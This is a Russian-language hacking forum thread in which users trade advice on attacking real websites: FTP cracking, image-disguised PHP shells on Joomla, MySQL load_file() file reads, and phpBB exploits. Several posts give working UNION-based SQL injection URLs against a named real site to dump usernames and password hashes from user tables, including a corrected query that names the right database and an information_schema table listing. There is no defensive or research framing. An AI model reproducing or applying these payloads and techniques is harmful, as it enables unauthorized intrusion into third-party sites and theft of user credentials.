Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. idTalis

    idTalis Elder - Старейшина

    Joined:
    30 Sep 2008
    Messages:
    31
    Likes Received:
    4
    Reputations:
    -5
    Интересуют уязвимомости и методы взлома Ftp, по возможности приводите ссылки, а то юзал поиск, поиск особых результатов не дал
     
  2. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    http://www.inattack.ru/article/97.html
     
    1 person likes this.
  3. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    frigid20, просто ты неправильно юзаешь.

    Вот правильно. Тебе осталось найти папку с правами на запись.
     
  4. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,192
    Reputations:
    430
    frigid20, https://forum.antichat.ru/threadnav34338-1-10.html прочти.
     
  5. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Всвязи с какими ошибками JOOMLA выдаёт сообщение на заливку шелла вида .php.gif -

    Фаил трататата не может быть показан,так как содержит ошибки.

    Версия JOOMLA 1.0.11
     
  6. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Велемир, напиши по порядку действия, которые ты делаешь. И не забывай, что шелл-картинка работает только при инклюде.
     
  7. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    PhpBB 3.0.1 перерыл всё могет кто подскажет что нить????

    http://forum.tvingo.ru
     
  8. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Если через PHP include,то его я пока не нашёл.Load_File() не читает почему-то,хотя несколько условий соблюдаются:

    1.Фаил расположен на сервере
    2.Hex значения принимаются


    Но вот насчёт третьего условия (права доступа к файлу) я сомневаюсь,так как при пхп инклуде и при лоад файле пользователи от разных приложений (я так думаю,но не факт,что это так)) ),ибо при пхп инклуде всё выходит.Запрет на load_file()...может,и действительно запрет,так как доказать я этого не смогу всвязи с отсутствием вывода ошибок.А так было бы высело почитать файлики:).На одном сервере так вообще были рутовые права,т.к. бд под рутом была,что достаточно редко бывает, а лоад файлом прочесть ничего не смог.Вот и облом:).Кто-то так пошутил нехорошо)))

    Кстати,вопрос в студию,который меня очень долго мучает: От каких серверных(или Бог знает каких) настроек зависит вывод списка директорий с помощь load_file() ? Пару раз всего смог так наслаждаться прогулкой по серверу:(:(
     
  9. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    Это капец! Здесь одни гуру сидят и про какойто phpBB 3.0.1 ничего сказать не могут!
     
  10. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Велемир, ты очень много всего сказал и из этого дельного - пара фраз)) Короче, load_file() может не работать из-за выключенного file_priv на пользователе из-под которого ты работаешь.

    И ещё одно - load_file() вообще не исполняет php код. Так что шелл-картинка не заработает через load_file().

    upd:

    Чтоб узнать есть ли права на чтение файлов с помощью load_file() не обязательно иметь вывод ошибок. Тем более даже вывод ошибок ничего не даст, за редким исключением.

    Надеюсь, на твои вопросы ответил, ибо вообще их не понял)
     
    1 person likes this.
  11. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    А чё сказать то ? Матом послать чтоли с форумом впридачу ? Выражай хоть мысли хоть как-то отражающие суть твоей проблемы,тогда и ответит кто-нибудь.И потом,не все сидят тут целый день.Как правило,у тех же *Гуру* и своих дел хватает.
     
  12. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    geforce,

    http://milw0rm.com/
    http://packetstormsecurity.net/
    http://google.com/

    з.ы. если ты про надпись "Гуру" у слова "Репутация" под аватаркой, то мне тебя жаль :'(
     
    1 person likes this.
  13. AHMED HASSAN

    AHMED HASSAN New Member

    Joined:
    25 Apr 2007
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    http://xxxx.org/ar/index.php?option=com_content&task=blogsection&id=7&Itemid=31

    how to inject this

    i tried after

    http://xxxx.org/ar/index.php?option=com_content&task=blogsection&id=7'&Itemid=31

    and

    http://xxxx.org/ar/index.php?option=com_content&task=blogsection&id=7&Itemid=31'

    doesnt work is this filtered how to bybass

    waitting.............................
     
  14. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    geforce, тебе тут никто ничего не должен
     
  15. Мистерео

    Мистерео Elder - Старейшина

    Joined:
    7 Aug 2006
    Messages:
    33
    Likes Received:
    32
    Reputations:
    1
    Народ вот такая проблема
    Сайт:http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat (version(),0x3a,database(),0x3a,user()),8/*

    Дальше роем и находим таблицы
    user
    -user_name
    -user_password
    tbl_user
    -u_username
    -u_password
    -u_email
    punbb_users
    -id
    -username
    -password
    -email

    составляем запросы


    Code:
    http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat_ws(0x3a,u_username,u_password),8+from+tbl_user+limit+1,1/*
    и
    Code:
    http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,password),8+from+punbb_users+limit+1,1/*
    Но сайт упорно не хочет показывать содержимое таблиц

    что делать чтобы оно показало?
     
  16. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    233
    Likes Received:
    433
    Reputations:
    287
    Там таблицы те лежат просто в другой БД
    Code:
    http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat_ws(0x3a,u_username,u_password),8+from+moxieforge.tbl_user+limit+1,1/*
     
    2 people like this.
  17. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    Начнем с того что никакого мата вовсе и небыло! А для тугих задаю вопрос вновь, какие уязвим есть У phpBB 3.0.1 ??

    Эт ты к чему говоришь? Всмысле тебе меня жаль?

    Ты не знаешь должны мне здесь или нет по этому попрошу без своего трёх капеечного флуда по этой теме лучшеб подсказала!
     
  18. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    Попробу сначало посмотреть что там вобще имеется

    http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,table_name,8+from+information_schema.tables/**/
     
  19. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    1)Для тугих будешь вопросы повторять в другом месте.
    2)За это время уже и сам мог баги поискать. Или на других форумах.
    3)Спайдер не девушка.
     
  20. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    1) Меня спросили я ответил!
    2) Поискал не беспокойся!
    3) Учту! (Аватар интересный :D :D :D )
     
Thread Status:
Not open for further replies.